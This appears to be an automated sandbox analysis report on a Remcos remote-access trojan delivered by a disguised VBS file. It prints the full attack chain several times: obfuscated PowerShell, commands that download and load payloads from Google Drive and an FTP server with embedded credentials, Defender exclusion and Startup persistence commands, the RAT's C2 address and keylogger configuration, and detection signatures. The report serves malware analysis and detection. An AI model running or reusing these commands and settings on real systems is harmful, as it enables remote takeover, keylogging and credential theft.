'Ds' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'HM' + [char]65 + 'ZQBy' + [char]65 + 'G8' + [char]65 + 'bg' + [char]65 + 'v' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Gk' + [char]65 + 'dQBx' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'GE' + [char]65 + 'cwB1' + [char]65 + 'Hc' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'Gw' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'Gg' + [char]65 + 'cwBy' + [char]65 + 'GU' + [char]65 + 'dwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'I' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'JwB1' + [char]65 + 'HM' + [char]65 + 'bQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'aQB3' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'VQBc' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 
+ '' + [char]65 + 'V' + [char]65 + 'By' + [char]65 + 'Eg' + [char]65 + 'VgB1' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'Ow' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQBt' + [char]65 + 'GE' + [char]65 + 'TgBy' + [char]65 + 'GU' + [char]65 + 'cwBV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'G0' + [char]65 + 'bgBv' + [char]65 + 'HI' + [char]65 + 'aQB2' + [char]65 + 'G4' + [char]65 + 'RQBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'HI' + [char]65 + 'ZQBz' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + '6' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'HU' + [char]65 + 'cwBt' + [char]65 + 'C4' + [char]65 + 'bgBp' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + 'BV' + [char]65 + 'Fw' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cs' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'QgBL' + [char]65 + 'Ew' + [char]65 + 'UgBV' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gw' + [char]65 + 'aQBG' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bl' + [char]65 + 'GY' + [char]65 + 'eQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + 
[char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'Ow' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'JwB0' + [char]65 + 'E8' + [char]65 + 'T' + [char]65 + 'Bj' + [char]65 + 'F8' + [char]65 + 'SwBh' + [char]65 + 'DM' + [char]65 + 'WgBm' + [char]65 + 'G8' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'y' + [char]65 + 'Eo' + [char]65 + 'SgBy' + [char]65 + 'FY' + [char]65 + 'a' + [char]65 + 'Bt' + [char]65 + 'FY' + [char]65 + 'OQBj' + [char]65 + 'G0' + [char]65 + 'OQBY' + [char]65 + 'HM' + [char]65 + 'dQBY' + [char]65 + 'G0' + [char]65 + 'ag' + [char]65 + 'x' + [char]65 + 'Gc' + [char]65 + 'MQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Cg' + [char]65 + 'I' + [char]65 + '' + 
[obfuscated [char]65 string concatenation elided];$nvcbv = $qKKzc.replace('???' , 'A') ;$acwwn = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nvcbv ) ); $acwwn = $acwwn[-1..-$acwwn.Length] -join '';$acwwn = $acwwn.replace('%XRqhI%','C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs');powershell $acwwn MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 4924 cmdline: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 3136 cmdline: powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 4232 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 6444 cmdline: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5424 cmdline: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 3796 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • RegAsm.exe (PID: 2820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • cmd.exe (PID: 3976 cmdline: cmd.exe /c del "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 876 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2168 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 7056 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cmd.exe (PID: 6276 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5412 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 6828 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 5440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "212.162.149.163:2404:0", "Assigned name": "NedDay", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-52K54M", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\ProgramData\1210\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i

Source | Rule | Description | Author | Strings
18.2.powershell.exe.19971c2ad28.3.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
18.2.powershell.exe.19971c2ad28.3.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
18.2.powershell.exe.19971c2ad28.3.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
18.2.powershell.exe.19971c2ad28.3.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x690b8:$a1: Remcos restarted by watchdog!
  • 0x69630:$a3: %02i:%02i:%02i:%03i
18.2.powershell.exe.19971c2ad28.3.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6317c:$str_b2: Executing file:
  • 0x641fc:$str_b3: GetDirectListeningPort
  • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x63d28:$str_b7: \update.vbs
  • 0x631a4:$str_b9: Downloaded file:
  • 0x63190:$str_b10: Downloading file:
  • 0x63234:$str_b12: Failed to upload file:
  • 0x641c4:$str_b13: StartForward
  • 0x641e4:$str_b14: StopForward
  • 0x63c80:$str_b15: fso.DeleteFile "
  • 0x63c14:$str_b16: On Error Resume Next
  • 0x63cb0:$str_b17: fso.DeleteFolder "
  • 0x63224:$str_b18: Uploaded file:
  • 0x631e4:$str_b19: Unable to delete:
  • 0x63c48:$str_b20: while fso.FileExists("
  • 0x636c1:$str_c0: [Firefox StoredLogins not found]

Source | Rule | Description | Author | Strings
amsi64_6764.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

                    System Summary

                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = [obfuscated [char]65 string concatenation elided]
                    Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = [obfuscated [char]65 string concatenation elided]
                    Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointM
                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = [obfuscated [char]65 string concatenation elided]
                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 
'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6764, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 4924, ProcessName: powershell.exe
                    Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs", ProcessId: 1492, ProcessName: wscript.exe
                    Source: Process started, Author: frack113: Data: Command: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1", CommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 
